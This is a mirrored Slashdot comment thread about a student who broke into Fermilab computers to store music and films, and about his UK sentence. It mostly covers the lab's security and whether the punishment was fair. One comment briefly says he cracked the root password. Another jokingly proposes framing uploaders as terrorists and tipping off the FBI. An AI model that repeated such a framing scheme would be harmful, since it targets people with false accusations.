Slashdot Mirror
Fermi Lab Compromised by Pirate
tttonyyy writes "The US Department of Energy sounded a full scale alert after machines were compromised at the Fermi National Accelerator Laboratory, according to this BBC article. It turns out that the hacker was a student using the machines to download and store music and movies."
used to store MP3's and DIVX's.
...
:-D
Shock Horror
Now if he'd accessed the controls for particle accelerator and was able to spin it up then thats news.
Worst
The China Syndrome
re*ac*tor by Neil Young
Duke Nukem Platinum Edition
Christmas at Ground Zero by Weird Al
The Atomic Cafe
Everyone's favorite video clip of Janet Jackson's right breast
Don't blame Durga. I voted for Centauri.
Um. This happened in 2002 according to the article. I think we've missed the boat on this one... the actual new information is the sentence handed down to the culprit.
++ Say to Elrond "Hello.".
Elrond says "No.". Elrond gives you some lunch.
The kid could have picked a less prominent host to save money on a hard drive.
Given that he probably did it for the self-boast rather than space, he should be roasted.
"Judge Andrew Goymer decided against sending McElroy behind bars as he had not accessed classified material on the network and had not intended to cause harm." This is quoted from the article, but in my opinion, I dont care what your intentions are, you hack into a place like that you should be thrown in jail even if its just to show everyone else how serious you are.
what kind of twit takes the space at a sensitive research facility for MP3s and divx stuff? he should also count himself lucky he wasn't in the US: he'd be halfway to [remote prison facility] within hours.
serves as proof that hackers aren't necessarily smart.
ed
This hacker could have inadvertaintly invented cold fusion just before Morgan Freeman destoyed chicago in an attempt to keep him from hooking up with Kate Winslet on his super-sonic 50cc Kawasaki.
I know for a fact this could have been worse. I saw it at the theater. Full price.
he gets 200 hours for hacking into a national laboratory, but will probably have to pay every last penny he owns to the RIAA and MPAA for having illegal copies of music. hrmm....
I wanted to see someone write "1 4m 1337" using an electron accelerator.
Arrr ... matey ... I reckon 'tis gold in dem particle collectors!
Seems pretty obvious that senstive computers should be physically separated from any connection to the internet?
"Computers are an important feature of life in the 21st century," said Judge Goymer.
"Government, industry and commerce, as well as a whole variety of other institutions, depend upon the integrity and reliability of their computers in order that their proper and legitimate activities can be carried on."
And that's the problem, in a nutshell. Dependency on technology that's flawed. But the judge, nor anyone running Fermi, seems to realize this.
We need crackers because without them there would be no one to point out how incredibly vulnerable these systems really are. I'd rather have a crack root a box to download mp3s now then have a real threat root a box and perform much more covert and dubious actions.
Obviously testing isn't enough.
Oh well. Let's lock up all those crackers. Lets keep the sploits in the hands of the real bad guys. Who cares about security.
Shame on the facility for having such weak security.
The national labs have done a good job at firewalling off the non-professionaly administered machines where feasible, but the academics really don't like anything that slows down collaboration. Thus there are lots of open machines, ftp and telnet still abound and give lots of opportunities to swipe usernames/passwords in the clear even though ssh and scp are available, etc.
Most (but not all) machines running the accelerator and the detectors are on their own mostly-private subnets.
In a surprise announcement from Fermi Labs, it would seem that the basic building blocks of matter, created from our accelerator tests is in fact, pr0n.
In fact there seemed to be quite a lot of it in our reports, as well as some indication that the sound of the big bang was in fact a Britney Spears mp3...
Not True. I work at IT another accelerator lab in the US, and the control network is on an entirely different network firewalled off, MAC restricted, etc. Even the software engineers responsible for the control system have to be wired behind the firewall.
On a not unrelated note, we have been hacked several times by people uploading movies, MP3s, etc. The system was never rebuilt and the files were simply deleted. In general accelerator labs are not staffed for the super-anal security that you would expect (to say nothing of the number of MP3s, etc. that legitimate users have on the server)...
The article isn't very specific about the level of access he had gained. I'm guessing the classified information was firewalled off from the network which he broken into for its internet bandwidth. At the very least, I'd expect (false hope?) that the actual particle accelerator controls aren't accessible from any internet-connected computer.
I've worked at Fermi National Accelerator Lab (fnal.gov) for 4 years, so perhaps I could troll a bit: since they have so many Linux machines (nearly all on Internet accessable IP) and no firewall (recently there are some firewalled ports) this is not a unique occurance, this happens *all* the time.
On the other hand, FermiLab does no defense/weapon work or any kind or any classified work as far as I know, a lot of people confuse it with Argonne National Lab (and be really glad Argonne wasn't named an Accelerator Lab, otherwise we'd have anal.gov)
-frin
Here's what really happened. Users in one of the labs are all given web space on a web server. Now, the IT staff is low on manpower, with government funding behind diverted to the war in Iraq. So, security (among other things) is kind of lax.
Basically, McElroy ran Jack the Ripper on the password file. We're using an SGI 1400L from 1997. He got the root password, and removed the limits of his disk quota. Then, he stored a bunch of ripped DVD's and MP3's in his webspace.
Now you ask, why isn't the government making a big deal about this? They know their security policy is weak, and they just ramped it up. The 'alert' is really just a few days for them to get things back they way they should be. If they said "well, we won't prosecute him because if people really know what happened, it'd make us look bad", what would the American public (and rest of the world) think?!
It could have been worse. He could have been caught smuggling atoms out of the place in his pockets.
"See? He's got atoms in his pockets! Call the local constabulary, Smithers!"
Don't blame Durga. I voted for Centauri.
It sounds like he was just a student who had access to those machines. Does knowing the root password make you a hacker?
How about a new headline: Student abuses Lab's computers.
heh, do you really think you can /. the bbc?
Have a look here to see their traffic. Totals are here. They can handle 2gb/sec. Thats some monster pipe, and it will take some severe slashdotting.
On the count of three, hit refresh like a mofo. If all 600,000 of us do it we might just create a tiny lump on that graph.
You deserve a head exam. Think here - how many people really believe that the control system for the collider is housed on a machine that was compromised (and is thus exposed to the internet at large)? Admittedly, there's a chance, but no moron would set up a network in this way. And who believes there aren't HARDWARE issues that would prevent an explosion - maybe even safeguards? What a freakin thought, considering this is a US DOE site. And what is this toxic material? The collider is basically a bunch of metal. Not sure what he'd overload, but usually heavy atoms or light atoms are slammed together to see what happens and measure particle/energy emissions. Where's the toxic material and explosive?
Oh, and what villages? They're 45 miles outside Chicago - not the smallest place. Don't worry though. Unless top quarks, CP violation experiments, and Boson experimentation threaten explosion, I think we're ok. Just try researching the subject. "fermilab" I'm feeling lucky gets you there.
That's not to say that massive damage/downtime can't be done by breaking into the right machines.
This happened last year, he's only just been sentenced (by the british, not the americans). And this had nothing to do with the Patriot act. The reason he chose Fermi Labs is that he mistakenly thought it was a academic facility and so would not pay bandwidth fees (unis etc in England don't pay for bandwidth)
I'm not condoning his actions, just trying to clear up some of the FUD
Sorry but the Large Hadron Collider is being built at CERN in Europe. It is not at Fermilab, and even if it were the "controls" for it would not be on the same network as the experiments, each of which would have its own authentication hosts, etc. anyway.
Mod this insightful.
Kids need to learn that downloading is not entirely free. You could have done something constructive in the time it takes you to cozy up to some release group on IRC, find a usable pub, looking for fills, fixing files with CRC errors, etc.
Not to mention the obsessive compulsive facet of downloading where you feel a need to keep your machine downloading at all times for fear of letting perfectly good bandwidth go to waste, at which point you go out to scour the net for something -- anything -- to download.
It is a big time commitment and, like channel surfing, hours fly by like minutes without you having seen anything interesting.
Or so I heard...
There are thousands of computers at Fermilab, the vast majority which are desktop workstations running linux (logins are through Kerberos). Being your typical office computers sitting on a desk, they are connected to the internet via fairly high bandwidth. As we know, the WWW was invented in order for high-energy physicists to share data throughout the world, so not only does it not make sense for these machines to be cut off from the internet, it is an essential part of scientific research. Any machine that actually controls an aspect of an experiment (connected to any sort of particle accelerator or detector) is not likely to be connected to the internet.
So, yes, physicists and other scientists do depend on flawed technology, mostly because its the easiest way to be able to keep connected when you're dealing with large collaborations stretched across the world. The downside may be the occasional kid (wrongfully) taking advantage of a desktop machine attached to a T1 line. Where security is more vital, it is present. But its simply impossible to insure that everyone's desktop machine is secure or not.
not always the case. the Muskegon Michigan water filtration plant has it's control computers on the network that has internet access so the paranoid supervisor can PC anywhere to spy on his employees. they have been infected several times with random viruses and trojans only because the idiot in charge of the plant wont listen to experts that that kind of stuff needs to be isolated.
one medium skilled cracker could easily cause insane damage/havoc by getting into those systems.
does the management care? nope. and if this is for a important thing like a water filtration plant, there is a very GOOD chance that their "critical" systems are just as open.
Important systems need to be disconnected completely. there is no reason to read your email or surf the net on the control Pc's.
Do not look at laser with remaining good eye.
Southwark Crown Court waived a demand for 21,000 in damages as it ruled that McElroy could not pay the fine.
That is the fine by britian. I wonder what british law he broke??
But he obviously broke USA law. I wonder if the FBI can arrest him and force his export.
I do not understand the culture of people thinking that they own everything. What gave this guy the right to steal bandwith from someone else? What gave him the right to steal the storage space? What gave him the right to break into someone elses pc?
The anwser is tougher laws and more extradition treaties. And by comparison, what ever happened to that phillapino kid who was caught writing viruses? I thought they threw the book at him. Why will the british kid get an easier sentance?
Rosco: "If brains were gunpowder, Enos couldn't blow his nose."
Is "community service" really really punishing or something? They were going to fine him 21,000 dollars, but instead chose to give him 200 hours of community service... That's $105 an hour.. can I find some community service like that? Please?
If you can read this, you are most likely close enough.
There is no "classified" information at Fermilab, other than payroll information, HR documents, etc. It's a purely scientific, basic energy laboratory.
While we're on the topic of particle accelerators, mark your calendars for 2007 -- that's when the Large Hadron Collider will be completed in Switzerland, marking a significant step forward in particle physics.
Here's a brief description from the CERN website:
What is LHC? The Large Hadron Collider (LHC) is a particle accelerator which will probe deeper into matter than ever before. Due to switch on in 2007, it will ultimately collide beams of protons at an energy of 14 TeV . Beams of lead nuclei will be also accelerated, smashing together with a collision energy of 1150 TeV.
A TeV is a unit of energy used in particle physics. 1 TeV is about the energy of motion of a flying mosquito. What makes the LHC so extraordinary is that it squeezes energy into a space about a million million times smaller than a mosquito.
The LHC is the next step in a voyage of discovery which began a century ago. Back then, scientists had just discovered all kinds of mysterious rays, X-rays, cathode rays, alpha and beta rays. Where did they come from? Were they all made of the same thing, and if so what? These questions have now been answered, giving us a much greater understanding of the Universe. Along the way, the answers have changed our daily lives, giving us televisions, transistors, medical imaging devices and computers. On the threshold of the 21st century, we face new questions which the LHC is designed to address. Who can tell what new developments the answers may bring?
the people in charge of the security at the lab?
Which do you consider more dangerous:
#1 Script Kiddie being hacking server to store films on.
#2 Running a nuclear lab with so little security a script kiddie can break in.
As a Pirate-American, I take offense at the use of the term "pirate" for a simple hacker or cracker. Where are his sea legs, his parrot/monkey, his eye patch or pegleg?
I'm not defending that little hacker guy (erm, what kind of hacker is he anyway exploiting a known weakness to gain bandwidth and storage for MP3 and DivX files... I'd rather make him manually punch one of these files into punch tape instead of those 200 hours civil service which he might find even interesting), but if you run a high-security network infrastructure, then you better be up-to-date with the latest patches and countermeasures. It's not done with applying the latest IE "security update" every Tuesday...
Now calling for a more drastic punishment and considering the current (IMO fair) one as a green light, just shows what's wrong with some people: If hijacking company computers and networks for bandwidth and storage abuse becomes an increasingly common practice in the online world than those "security experts" should probably do their homework and fix the systems instead of calling the cops.
If you leave your car open and someone steals your car hifi, it's entirely your fault. (Go ask your insurance...) Whose car it is shouldn't play a role when sentencing the thief.
Fermi Lab Compromised by Pirate
Damn it. I was expecting a bit of coastal raiding action from this story. Maybe black flags with the skull and crossbones. A little rapine and pillaging of the Fermi Lab.
Damn corruption of the English language.
Why does everybody seem to think that Fermilab is some kind of sensitive facility? News flash: Fermilab is a basic research facility, not a top secret weapons lab. Their security is lax because they really don't have anything to hide. All their results are available to the public anyway. After all, that is sort of the whole point of basic research. And it's not like the compromised computer was part of the control system or anything. Fermilab has a lot of computers. The place is huge.
Besides which, if you actually read about the case you'd realize that this guy had access to the computers anyway and all he did was crack the root password to increase his disk quota. Now, I'm not saying that's a good thing but it's more like abuse of a computer lab than anything.
Physics is good
Have a look here to see their traffic. Totals are here. They can handle 2gb/sec.
McElroy's note to self: next time store music and video on BBC computers, not FermiLab.
Ooh, a sarcasm detector. Oh, that's a real useful invention.
This Just In...
Fermi Labs announced the production of a new supersized sub-atomic particle, boxons. Boxons were created by smashing oxygen with bosons (another sub-atomic particle).
Examined through the most powerful microscope in the world, the boxon appears to be a cardboard box, with the words "Shroedinger's Cat" written on the side. Sadly, the box is empty.
It's funny that the article made so many claims about how firecely the DoE closed things down at the lab, and how they oversee nuclear weapons and such. Yes, Fermilab is funded by the DoE, and so they fall under the same rules for terrorist paranoia. But the lab has an extremely small amount of radioactive material on site. Mostly it's just small check sources and such for testing detectors. There are some slightly stronger sources for testing calorimeters, and I think there's even a tiny amount of Uranium, but not even close to a critical mass of the stuff. They do not have a nuclear reactor on site. No weapons research is being done there, only particle physics with the accellerator with a bit of astrophysics and neutron therapy on the side.
Fermilab has really been suffering from tighter restrictions since 9/11. They have a lot of community outreach programs, but these days it's not as easy for the public to visit the lab. They still can, but have to jump through a hoop or two. It's really too bad. It used to be completely open, and folks would often be seen fishing, hiking the prairie, or watching the geese and buffalo.
As for "confidential" material that a hacker could access -- The experiments are publicly funded and the data is all, technically, publicly available. But in practice the data from the various experiments is generally kept somewhat secure just so that physicists on competing experiments have a hard time "stealing" the data. But honestly, in order to make any sense at all of this kind of data you'll need a hundred people with an intimate knowledge of the experiment spending a few years on analysis. All experimental results are published in journals and are freely available on the web.
As for tampering with the data, well that's possible but to influence anything you'd have to be impossibly clever and hack systematic changes into tens of TB of raw data, which would require figuring out how it's packed, what it all means, and knowing enough physics to search for events and adjusting things accordingly. For any single individual, that's just impossible.
As for controlling the accellerator, that's ridiculous too. First of all, there is a lot of analog electronics controlling the thing in addition to the computers, and it requires a sizeable team of scientists to operate. I'm sure that someone could cause troubles if they wanted, but never any damage. The worst that could happen is for a magnet in the Tevatron to overheat and no longer superconduct. When that happens the magnet boils off a lot of liquid helium as a protective measure, and the beam wrecks into the sides of the beampipe. This happens every few weeks anyway, without the help of hackers. There is nothing dangerous you could do with the beam, aside from entering the tunnel and sticking your head near it. And to do that you have to cleverly defeat all the interlocks. I've even seen a curious colony of ants trip the interlocks, shutting down the accellerator for a couple hours.
The lab is big on security simply because it's funded by the DoE. There's no other good reason for it. It DOES tend to be a target for hackers because they have lots of computers, mostly running Linux (with pockets of AIX, IRIX, Solaris, OSF1, and VMS), and (forgive me) the computing staff really means well but often screws up. Nothing is a "decision", it's always a "policy". They have gone with Kerberos and some crypto-card thing which is entirely insecure. They must have known about the possible exploits of the crypto-card system years ago, as I knew someone who figured out a couple (very easily) and were trying to let the Fermilab computing group know about it in the best way. I think the blame lies in trying to keep telnet ports open for people who need to log in remotely from computers running Windows that do not have an SSH client installed.
I've posted this unpopular sentiment before and I guess I am still on the pedestal.
Those machines, and many others are just as open to our enemies the likes of which include Osama Bin Laden, Saddam Hussein (before he was captured) and many others. Had they cracked in (which they may well have done and may well be doing), the machines will probably not be used as a receptical for kiddie porn.
Were it not for kids that are just mucking about poking their collective digits where the authorities would rather not be poked - our authorities would remain FAT DUMB and HAPPY dreaming their collective bliss.
We live in the real world where we have many real enemies. We need secure systems that we can count on. Each time some kid pokes his finger into a vulnerable spot it helps to educate the masses that they really do need to pay attention.
Perhaps the judge in this case realises this. 200 hours is a suitable punishment, even if it is perhaps a little severe.
One thing that I think needs to be recognised is that there are many would be very competant systems admins who frequent slash dot. Many of these people would relish a well paying job and could be gainfully employed closing these security holes. Perhaps our authorities and joe sixpack in general should open their eyes and smell the coffee here.
On a not unrelated note, we have been hacked several times by people uploading movies, MP3s, etc. The system was never rebuilt and the files were simply deleted.
Evil solution: Take MP3s, DivXs, etc.; modify them to include very badly 'hidden' steganographic information that looks like it came from terrorists. Replace originals. Wait for uploaders to download them again. Anonymously tip-off FBI that said h4x0r may be involved in terrorism. FBI search their hard drives, shit hits the fan.
Step 3- Profit! Oh, hang on- that's the one thing you *don't* get out of this method.
"Slashdot - News and Chat Sites Deviant". (Click "homepage" link above for details).
First of all, it is not possible to log into any service at Fermilab without a Kerberos principal. ftp and telnet are not permitted, and there is an active security eam that scans ports on a continuous basis and will shut down any offending machine. There is no firewall because all traffic must be either outgoing web and data services or kerberized if incoming.
I have personally seen Windows machines shut down within minutes and their wireless cards confiscated when brought onto the site if a virus is detected. These scans are not optional to the user and are automatically performed. The fact that this user was caught and security tightened to prevent recurrences is proof that there is good security there. The comments above are almost all completely uneducated.
Finally, as noted above by some (few) intelligent readers, the story is old and is really about sentencing. there has been no recent compromise.
Troll-prevention note and disclaimer: For those who think the above or the story itself is an invitation to hack, I can point out that several such attempts occur per day, keeping the security team busy and alert, but that essentially all of them fail and the rare successful ones earn the attention of the FBI.
At least at Brookhaven NL, all the computers have a paragraph at login, "WARNING: The system you are using is property of the Department of Energy, it's not for use beyond your job, unautorized access == crucifixion, yadda yadda"...you'd have to be beyond retarded to not realize you're where you're not supposed to be. Machines on the internal network don't usually have .gov hostnames, though - just an IP, or the machine name.
Facts do not cease to exist because they are ignored. - Aldous Huxley
More interesting than the actual act of hacking into a US DoE network is the legal precedent set by the Judge in the UK. Although he found the kid guilty and sentenced him to 200 hours of community service, he failed to make him pay the roughly $38,000 in damages he cost the DoE as they took 17 computers down for 3 days to clean up the mess he made.
i n.hacker.reut/index.html the justification for failing to make the kid pay the actual financial damages he caused was that no classified information was compromised. This sets a legal precedent that is simply outstanding for budding young international hackers both in the US and the UK, because it means that as long as they do not compromise classified information, they can cause as much financial loss as they want and not be held liable for it beyond public service outside of the country they caused the damage in. For US script kiddies, this should mean that if they're caught hacking into UK government systems, the UK government should not ask the US to recover any financial damages unless classified information was compromised.
According to CNN http://www.cnn.com/2004/TECH/internet/02/03/brita
See, the US and UK really ARE allies in the war against... ummm... are we FOR or AGAINST script kiddies this week?
Nothing.
Nothing, aside from the notoriety of this trial, which may not even follow him that far - a google search on his name (Joseph McElroy) doesn't even turn up stuff referring to him in the first page. (That what he gets for sharing his name with a famous author)
The judge decided against jail time because "he had not accessed classified material on the network and had not intended to cause harm". Also, the monetary claim for damages against him was waived on the grounds that he wouldn't be able to pay it.
"not intended to cause harm"? "not intended to cause harm"? Tell me, can I bypass the metal detectors at Heathrow simply because I'm not carrying any weapons, and even if I were, intend to cause no harm with them? What if I just want to drive to the store and back, but would rather hotwire your car instead of walking?
Sure, I understand that the US has some truly brutal criminal trespass laws that are probably way out of proportion to the act they supposedly punish, and that therefore a UK judge might be more lenient in this case than a US one would, but... nothing?
First off, thanks for writing this. I used to be the lead of the UNIX admin team at FERMILAB quite a few years ago. The people who've been writing all this drivel need to remember that FERMI has fewer "secrets" to hide from people than just about any small business has. Oh they have a lot of stuff that one team of scientists would just as soon the others didnt' see till they publish it, but nothing classified.
As to taking over the accelerator (lets just ignore the fact that the Hadron collider is on a different continent and not running yet) - You've obviously never watched a whole bunch of particle physicists spend a week trying to get something resembling a usable beam out of the accelerator. It's not like there's a "destroy the world" button on a web site. And trust me, that stuff isn't Internet accessible.
I also don't think that people understand that computer security at a site of this type is a continual battle over the security=1/convenience rule. The physicist-users want convenience. The computing staff wants security - it's pretty much like anywhere else. I was still having arguments with experimenters who didn't want to have passwords while I was there. I'm sure it's only somewhat better now.
You have to remember that FERMILAB is much more like a graduate school in many ways than it is a secure classified site.
I do not understand the culture of people thinking that they own everything. What gave this guy the right to steal bandwith from someone else? What gave him the right to steal the storage space? What gave him the right to break into someone elses pc?
He's a script kiddie who stored some mp3s and movies on a poorly-secured machine in an unclassified lab.
He used some bandwidth and storage space for his personal convenience. He didn't delete anyone's files, set up a spam relay, break into (or try to break into) more sensitive systems, or do any real harm. At worst, he should be on the hook for bandwidth costs and a nominal charge for the use of storage space; he also owes some apologies.
He's a not-particularly-bright college kid who didn't cause any lasting harm, nor physical injury.
So--would it be appropriate to take from this kid the years of his life that extradition, an American trial, and the American prison system would take...for downloading some mp3s? Is it worth the cost of transporting him, housing him, and trying him?
Don't you think the FBI should have better things to do? They won't generally get involved even in the United States unless a million dollars or a kidnapping are involved.
~Idarubicin
Here's the lesson:
Hacking into a national research laboratory with a particle accelerator, attempting to unlock the secrets of the universe = 200 hours community service
Hacking into a Fortune 500 company, with a dedicated legal team and a public image to maintain = 3-5 years in a federal pound-you-in-the-ass prison.
Are we taking notes?
-Hentai [in vita non pacem est]
Hacking into a national research laboratory with a particle accelerator, attempting to unlock the secrets of the universe = 200 hours community service
Hacking into a Fortune 500 company, with a dedicated legal team and a public image to maintain = 3-5 years in a federal pound-you-in-the-ass prison.
Logging onto Kazaa to download the latest Britteny Spears album........priceless